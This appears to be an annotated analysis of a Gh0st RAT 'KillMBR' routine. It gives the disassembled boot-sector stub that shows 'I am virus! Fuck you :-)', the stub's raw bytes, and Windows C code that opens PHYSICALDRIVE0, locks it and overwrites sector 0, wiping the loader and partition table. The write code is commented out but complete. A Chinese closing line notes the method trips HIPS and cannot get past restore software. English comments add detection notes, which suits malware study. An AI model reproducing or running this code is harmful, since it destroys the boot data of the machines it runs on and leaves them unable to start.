被改写的MBR代码:
作用是清屏并显示字符串"I am virus! Fuck you :-)",然后进入死循环
; Boot-sector stub, 48 bytes in total: 24 bytes of code at 0000h-0017h followed by
; the 24-byte ASCII message at 0018h. Nothing here touches the disk; the damage is
; done by the writer that puts these bytes into sector 0, not by the stub itself.
; AH = 00h / AL = 12h: set video mode. Switching modes also blanks the display,
; which is the "clear screen" effect described in the analysis above.
seg000:0000 mov ax, 12h
seg000:0003 int 10h ; - VIDEO - SET VIDEO MODE
seg000:0003 ; AL = mode
; 7C00h is the conventional BIOS load address of the boot sector, so 7C18h is
; s_IAmVirusFuckY below. The code never loads ES, so it relies on the BIOS
; leaving ES = 0 at handoff -- an assumption, not something this listing proves.
seg000:0005 mov bp, 7C18h ; string start addr
; CX = 18h = 24 = length of the message in bytes.
seg000:0008 mov cx, 18h ; string length
; AH = 13h write string, AL = 01h: bit 0 set (advance cursor after write),
; bit 1 clear (attribute taken from BL, see the INT 10h comment below).
seg000:000B mov ax, 1301h
; BH = 00h display page 0, BL = 0Ch attribute (light red on black).
seg000:000E mov bx, 0Ch
; DH = 0Eh row 14, DL = 1Dh column 29.
seg000:0011 mov dx, 0E1Dh
seg000:0014 int 10h ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA)
seg000:0014 ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page number
seg000:0014 ; DH,DL = row,column of starting cursor position, CX = length of string
seg000:0014 ; ES:BP -> start of string
seg000:0014
seg000:0016
; NOTE(review): LOOP is conditional -- it decrements CX and branches only while
; CX != 0. Whether this really spins forever therefore depends on the value of CX
; after the INT 10h call, which cannot be determined from this listing; if CX
; reaches zero, execution falls through into the message bytes at 0018h.
seg000:0016 ForeverLoop: ; CODE XREF: seg000:ForeverLoopj
seg000:0016 loop ForeverLoop
seg000:0016
seg000:0016 ; ---------------------------------------------------------------------------
; The displayed message; also the fall-through target noted above.
seg000:0018 s_IAmVirusFuckY db 'I am virus! Fuck you :-)'
seg000:0018 seg000 ends
写入MBR的C代码:
// Raw bytes of the boot-sector stub disassembled above: 24 bytes of code
// (mov / int 10h / loop) followed by the 24-byte ASCII message, 48 bytes in all.
// As a string literal it carries an implicit trailing NUL, which is why KillMBR
// copies sizeof(scode) - 1. Written into a zero-filled 512-byte sector this
// destroys the partition table as well as the original loader code.
unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
// Analyst's notes on CGh0stApp::KillMBR (the class name suggests the Gh0st RAT
// codebase). In this build every destructive statement is commented out, so the
// routine is a no-op that returns 0 and has no side effects. If the body were
// active it would:
//   1. build a 512-byte sector in pMBR: scode at offset 0, zeros elsewhere (so
//      the partition table at 1BEh-1FDh is wiped too), 55h AAh boot signature
//      at bytes 510/511;
//   2. open \\.\PHYSICALDRIVE0 for read/write, FSCTL_LOCK_VOLUME it, WriteFile
//      the 512 bytes at the handle's initial position (sector 0), unlock, close;
//   3. ExitProcess(-1), so the final `return 0` would never be reached.
// Detection / mitigation: a user-mode process opening the raw physical-drive
// device path for write, followed by FSCTL_LOCK_VOLUME and a raw WriteFile, is
// the behaviour HIPS/EDR products alert on -- the author's closing remark below
// concedes exactly this. Only the original sector 0 (or a backup of it) restores
// a machine once the write has landed.
//
// Returns: 0 (always, in this build).
int CGh0stApp::KillMBR()
{
// HANDLE hDevice;
// DWORD dwBytesWritten, dwBytesReturned;
// BYTE pMBR[512] = {0};
//
// // Rebuild the MBR
// memcpy(pMBR, scode, sizeof(scode) - 1);
// pMBR[510] = 0x55;
// pMBR[511] = 0xAA;
//
// hDevice = CreateFile
// (
// "\\\\.\\PHYSICALDRIVE0",
// GENERIC_READ | GENERIC_WRITE,
// FILE_SHARE_READ | FILE_SHARE_WRITE,
// NULL,
// OPEN_EXISTING,
// 0,
// NULL
// );
// if (hDevice == INVALID_HANDLE_VALUE)
// return -1;
// DeviceIoControl
// (
// hDevice,
// FSCTL_LOCK_VOLUME,
// NULL,
// 0,
// NULL,
// 0,
// &dwBytesReturned,
// NULL
// );
// // Write the virus payload
// WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
// DeviceIoControl
// (
// hDevice,
// FSCTL_UNLOCK_VOLUME,
// NULL,
// 0,
// NULL,
// 0,
// &dwBytesReturned,
// NULL
// );
// CloseHandle(hDevice);
//
// ExitProcess(-1);
return 0;
}
不过写MBR的方法很挫,会被HIPS报警,而且不能穿透还原或影子